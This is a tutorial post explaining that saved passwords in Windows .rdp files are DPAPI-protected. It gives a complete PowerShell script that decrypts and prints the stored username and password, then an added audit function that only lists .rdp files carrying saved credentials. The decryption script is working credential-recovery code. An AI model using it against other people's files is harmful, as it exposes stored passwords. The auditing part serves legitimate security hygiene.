RDP File encrypted password

Come across a .rdp file with an encrypted password like this?

full address:s:172.16.0.32
username:s:joe
password 51:b:01000000D08C9DDF0115D1118C7...7C9CD17D414000000B542DA5BA10CBD5C77EF075D822F0F7A1FFD77C0
screen mode id:i:2
<SNIPPED>

RDP files can store the password for a connection. The password is protected with the key of the user who saved the file.

The password can be decrypted with the .NET System.Security.Cryptography.ProtectedData class.

This script opens an rdp file and retrieves the user and the password:

<#
    .SYNOPSIS
        A PowerShell script to decrypt passwords from rdp files
    .DESCRIPTION
        A PowerShell script to decrypt passwords from rdp files
    .PARAMETER rdpfile
        rdp file
#>
[CmdletBinding()]
Param(
  [Parameter(Mandatory=$true,Position=1)][alias("f")][string]$rdpfile="C:\Users\Joe\Desktop\WS02.rdp"
)  
 
if(-not (Test-Path $rdpfile))
{
    write-warning ("File {0} not found!" -f $rdpfile)
    exit 2
}
 
[string]$sUserName=$null
[string]$sDomain=$null
[string]$sEncryptedPass=$null
[string]$sPass=$null
 
# Read RDP File
$sFileContent=Get-Content $rdpfile
foreach($sLine in $sFileContent)
{
    if($sLine.StartsWith("username:s:"))
    {
        $sUserName=$sLine.Replace("username:s:","")
    }
    elseif($sLine.StartsWith("domain:s:"))
    {
        $sDomain=$sLine.Replace("domain:s:","")
    }
    elseif($sLine.StartsWith("password 51:b:"))
    {
        $sEncryptedPass=$sLine.Replace("password 51:b:","")
    }
}
# Check Input
if(!$sUserName)
{
    write-warning "No username found!"
    exit 2
}
if(!$sEncryptedPass)
{
    write-warning "No encrypted password found!"
    exit 2
}
if($sUserName.IndexOf("\") -lt 0 -and  $sDomain)
{
    $sUserName="{0}\{1}" -f $sDomain,$sUserName
}
 
 
# Load the assembly that provides ProtectedData (LoadWithPartialName is obsolete)
Add-Type -AssemblyName System.Security
 
$iBytes=$sEncryptedPass.Length/2
[byte[]]$aEncryptedPasswordBytes = New-Object -TypeName byte[] $iBytes
for ($i = 0; $i -lt $iBytes; $i++) {
    $aEncryptedPasswordBytes[$i] = [System.Convert]::ToByte($sEncryptedPass.Substring($i*2,2), 16)
}
[byte[]]$passwordAsBytes = [System.Security.Cryptography.ProtectedData]::Unprotect($aEncryptedPasswordBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser)
$sPass=[System.Text.Encoding]::Unicode.GetString($passwordAsBytes)
 
write-host ("{0,-16} : {1}" -f "UserName",$sUserName)
write-host ("{0,-16} : {1}" -f "Password",$sPass)

Output:

Such a file only works on the PC where the encrypted password was generated, because DPAPI binds it to the user's key on that machine.
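
Because any process running as that user can recover the password this way, it is worth knowing which .rdp files on a machine carry a saved password at all. The following is an added example, not part of the original script: it parses the name:type:value settings and reports files containing a "password 51:b:" blob without decrypting it. Find-RdpStoredPassword is a hypothetical helper name, and the sample file and its blob are constructed.

```powershell
# Added example: list .rdp files that carry a saved "password 51:b:" blob, without decrypting it.
# Find-RdpStoredPassword is a hypothetical helper name.
function Find-RdpStoredPassword {
    [CmdletBinding()]
    Param(
        [Parameter(Mandatory=$true,Position=0)][string]$Path
    )
    # A DPAPI blob starts with version 1 and the provider GUID
    # df9d8cd0-1501-11d1-8c7a-00c04fc297eb, which hex-encodes to this prefix.
    $sDpapiHeader = "01000000D08C9DDF0115D1118C7A00C04FC297EB"

    Get-ChildItem -Path $Path -Filter *.rdp -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $oFile = $_
        $hSettings = @{}
        foreach ($sLine in (Get-Content -LiteralPath $oFile.FullName)) {
            # Settings are "name:type:value"; split on the first two colons only.
            $aParts = $sLine -split ':', 3
            if ($aParts.Count -eq 3) {
                $hSettings[$aParts[0].Trim().ToLower()] = $aParts[2].Trim()
            }
        }
        $sBlob = $hSettings["password 51"]
        if ($sBlob) {
            [pscustomobject]@{
                File        = $oFile.FullName
                Address     = $hSettings["full address"]
                UserName    = $hSettings["username"]
                BlobBytes   = [int][math]::Floor($sBlob.Length / 2)
                IsDpapiBlob = $sBlob.StartsWith($sDpapiHeader, [System.StringComparison]::OrdinalIgnoreCase)
                LastWrite   = $oFile.LastWriteTime
            }
        }
    }
}

# Constructed sample: the settings from the file shown above, with a placeholder blob
# (real DPAPI header followed by zero bytes, not a real credential).
$sDir = Join-Path ([System.IO.Path]::GetTempPath()) "rdp-audit-sample"
New-Item -ItemType Directory -Path $sDir -Force | Out-Null
@(
    "full address:s:172.16.0.32",
    "username:s:joe",
    ("password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB" + ("00" * 16)),
    "screen mode id:i:2"
) | Set-Content -Path (Join-Path $sDir "WS02.rdp")

Find-RdpStoredPassword -Path $sDir | Format-List
```

Files it reports can be re-saved without the stored credential, so the password is prompted for at connect time instead.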
